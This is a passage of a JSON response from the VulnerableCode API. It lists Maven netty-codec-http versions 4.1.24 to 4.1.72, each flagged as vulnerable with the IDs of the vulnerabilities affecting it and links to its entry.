l"},{"url":"http://public2.vulnerablecode.io/api/packages/193854?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.24.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.24.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193855?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.25.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.25.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193856?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.26.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.26.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193857?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.27.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.27.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193858?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.28.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.28.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193859?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.29.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.29.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193860?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.30.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.30.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193861?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.31.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.31.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193862?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.32.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.32.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193863?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.33.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.33.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193864?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.34.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.34.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193865?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.35.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.35.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193866?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.36.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.36.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193867?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.37.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.37.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193868?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.38.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.38.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193869?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.39.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.39.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193870?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.40.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.40.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193871?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.41.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.41.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193872?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.42.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.42.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/199237?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.43.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-r7tw-km29-4bdp"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.43.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/199238?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.44.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.44.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/230149?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.45.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.45.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/230150?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.46.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.46.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/230151?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.47.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.47.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/230152?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.48.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.48.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/230153?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.49.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.49.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/230154?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.50.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.50.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/230155?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.51.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.51.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/230156?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.52.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.52.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/230157?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.53.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.53.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/230158?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.54.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.54.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/230159?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.55.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.55.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/230160?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.56.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.56.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/230161?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.57.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.57.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/230162?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.58.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.58.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/74613?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.59.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.59.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/273150?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.60.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.60.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/273151?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.61.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.61.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/273152?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.62.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.62.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/273153?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.63.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.63.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/273154?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.64.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.64.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/273155?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.65.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.65.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/273156?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.66.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.66.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/273157?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.67.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.67.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/273158?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.68.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.68.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/273159?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.69.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.69.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/273160?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.70.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.70.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/74417?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.71.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.71.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/673242?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.72.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.72.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/673243?format=js